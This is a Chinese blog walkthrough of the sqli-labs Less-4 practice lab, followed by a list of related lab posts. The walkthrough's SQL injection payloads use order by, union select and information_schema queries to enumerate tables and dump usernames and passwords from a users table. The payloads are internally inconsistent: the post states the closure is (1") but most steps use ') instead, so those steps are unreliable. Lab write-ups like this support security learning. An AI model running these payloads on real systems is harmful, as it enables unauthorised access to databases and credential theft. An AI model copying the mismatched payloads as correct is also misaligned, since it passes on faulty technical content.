sqlilabs Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)_小白鼠日常

最新推荐文章于 2023-05-28 16:10:53 发布
最新推荐文章于 2023-05-28 16:10:53 发布
阅读量137 收藏
点赞数 1
文章标签: p2p 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/captainLink/article/details/125227104
版权

SQL注入 信息泄露 数据库操作 闭口查询 union select
关键词由CSDN通过智能技术生成

一、使用转义符 “ \ ” 查询闭口的格式


查询结果显示使用的闭口形式为 (1")

二、使用order by来判断字段数

①在输入order by 4时,显示报错

②在输入order by 3时,成功;说明他有三个字段。

代码:?id=1') order by 3-- -

三、使用union联合注入,配合select查询可注入点。

代码:?id=-1') union select 1,2,3 -- -
得出结果:2,3为注入点

四、利用第三步得到的注入点查询系统与当前数据库信息

version()        //系统版本号
database()        //当前数据库
代码:?id=-1') union select 1,version(),database() -- -
结果:        系统版本号为   5.7.26
                当前数据库名   security

五、爆库

 concat 将数据中的字符串进行拼接后,以列表数据(多条字符串)的形式展现出来。 group_concat 将数据中的字符串进行拼接后,以一条数据(字符串)的形式展现出来。
注意:使用group_concat的时候可能会出现数据重复,可以在括号里面输入"distinct+空格"!!!
代码:?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -        //最后的database()也可以写成'security' 当前库的库名
结果:得到了emails、referers、uagents、users四个表。

六、爆表

基于第五步获得的四个表名,判断他的账户密码信息在users表里;针对users表进行爆破。
代码:?id=-1") union select 1,group_concat(username),group_concat(password) from users-- -
 

第四关通了,我的天,我通了!完结,撒花!!!!!

 

 

入门小白鼠
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlilabs Less-3 GET-Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)_小白鼠日常
captainLink的博客
06-10 230
sqlilabs-less3通关(小白鼠日常)
less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)...
TYW168168的博客
05-10 375
1、针对‘、“做简单的变形,代码如下: $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 具体页面显示如下: 针对提示错误,可以看出针对查询参数添加()做变形。这种等同于我们开始的单引号报错,闭合方式一样使用括号闭合,然后将后面的单引号注释掉。 http://127.0.0.1/sqli/Less-3/?id=-1'...
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误的GET单引号变形字符注入
sm1918451478的博客
10-31 388
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误的GET单引号变形字符注入
sqli-lab教程——Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)
luosaierdadi的博客
07-06 137
输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,猜想一下咱们输入1在数据库语句中的位置,形如select ... from ... where id=(‘1’) ...,在第一题中id=1‘的后面单引号加上),其它保持不变就行了。其实我推荐,做完题去看看它题目的php传参语句,和过滤语句,对理解sql注入原理很有帮助的。......
sqli-lab练习(三)--------GET-Error based-Single quotes with twist-String
wkend的博客
04-16 582
sql语句源代码 $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 首先,我们先构造一个单引号注入' 我们来分析,错误提示'''') LIMIT 0,1' 由于在sql语句中,单引号的数量都是双数的,这样才能正确的闭合语句,但是在错误提示中我们可以看到,出现了5个',这就出现了问题,sql语句没有正常闭合。 而且,根据sql...
php中get_magic_quotes_gpc()函数说明
12-18
`magic_quotes_gpc`是一个在`php.ini`配置文件中设置的指令,当其开启(设置为`On`)时,PHP会自动在所有通过GET、POST和COOKIE传递的字符串中添加反斜杠,用以转义特定字符,包括单引号('),双引号("),反斜线(\)...
php-magic-quotes-gpc:在PHP 5.4更高版本上为旧版代码实现magic_quotes_gpc
05-14
PHP魔术引号实现在PHP 5.4更高版本上为旧版代码实现magic_quotes_gpc 如果您要将旧版源代码迁移到上述PHP 5.4版的环境中,但是根据Magic Quotes magic_quotes_gpc SQL保护,其中包括许多易受攻击的数据库查询代码。...
sublime-text-latex-smart-quotes:Sublime Text Package,以一种聪明的方式插入引号
05-10
此Sublime Text Package的目的是使LaTeX中的引号“聪明”,即插入您打算使用的引号。 它的灵感来自于Emacs的。 要建立此目标,它使用: 语言检测(支持的语言:英语,德语,法语) 根据插入位置进行上下文检测 ...
to-double-quotes-cli:将匹配的单引号转换为双引号
04-29
$ npm install --global to-double-quotes-cli 用法 $ to-double-quotes --help Usage $ to-double-quotes <string> $ echo <string> | to-double-quotes Example $ to-double-quotes "I love 'unicorns'" I ...
geek-quotes-app:一个显示随机极客引号和玩github-pages托管的应用程序
03-14
极客报价应用用于显示极客报价的简单vue应用程序。 这是一个学习项目,用于在github-pages上托管vue应用程序。 它使用了的 。项目设置npm install编译和热重装以进行开发npm run serve将版本部署到gh pages分支(在...
sqli-labs】 less3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)...
ajxi63204的博客
01-18 369
实质上和less1没有多大区别,看懂了一样走流程 提交参数 加单引号 http://localhost/sqli/Less-3/?id=1' 观察报错,看near 和 at 的引号之间内容 '1'') LIMIT 0,1 1后面有一个 ' 是我们添加的,于是正常的sql语句应该是 select ... from ... where xx=('...
SQLi-Labs】Less-3 GET - Error based - Single quotes with twist
xw1995115的博客
11-15 455
与less-1、less-2原理相同,基于报错提示我们可以大致猜测后台sql逻辑,为了产生报错需要人为制造语法错误SQL注入中常使用单引号来制造错误 ?id=1' 观察报错提示,发现除了需要封闭单引号外还需要额外封闭一个括号,因此构造以下查询 ?id=-1') union select 1,database(),user() --+ 查询被成功执行,可利用union select执行更多查询,至此本节结束 ...
sqli-labs通关-------03lesson-single_quotes_with_twist
枯藤闲画云
05-31 614
基于括号 用?id=1 没问题啥都有 试试单引号,报错如下 然后我们就试试)发现差不多 但是我们会发现一个很尴尬的问题 就是and1=2 前面竟然没有爆错????看看源码,打印语句 http://127.0.0.1:90/sqli-labs/Less-3/?id=2) and 1=2 union select 1,2,3--+ 只有这样我们才能成功!!!加上引...
sqli-labs less 14 POST -Double injection -Single quotes -String -with twist
Monster1m的博客
01-19 99
真希望所有的都和这几关一样简单,这一关继续参考12,一模一样,但是这一关的闭合方式为双引号" 12链接: https://blog.csdn.net/Monster1m/article/details/112850142
sql-labs SQL注入平台-第3关Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)
Onlyone_1314的博客
05-28 224
Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)查看源代码发现我们输入的id值被括号(‘’)包围起来了,这样导致我们输入的值都会被当作括号里的id。成功使用union联合查询。
Sqli-labs Less-3 Error Based- String (with Twist)
04-15 289
首先还是看网页提示输入id测试,输入id后加单引号看有什么输出。 payload /sql/Less-3/?id=1' 可以看到报错,报错在1后面有一个括号,换一个payload试一下。 payload /sql/Less-3/?id=1') --+ 可以看到可以正常显示内容。 接下来确定回显位置。 /sql/Less-3/?id=-1') union select 1,2,3--+ 可以看到回显位置为2和3的位置,这里要注意id要设置为-1才能够看到回显位置,因为id为-1
GET-ERROR based-Single quotesString (GET基于错误的单引号字符注入) Less-1
water0diamond的博客
03-12 926
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类是否为字符串,用单引号测试,出现‘’’说明id为字符串类 那么下面我们试着添加...
sqli-labs(less3)GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)
m0_68980215的博客
07-06 93
sqli练习
SQL注入闯关第二关---第四关
qq_54037445的博客
10-06 1485
sqlilabsql注入闯关第二关到第四关详细讲解
stylelint string-quotes
最新发布
08-15
回答: 在Stylelint中,string-quotes是一个用于定义字符串引号规范的配置项。它可以控制字符串的引号类,有三种可选的配置值:"single"、"double"和"consistent"。其中,"single"表示只允许使用单引号,"double...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值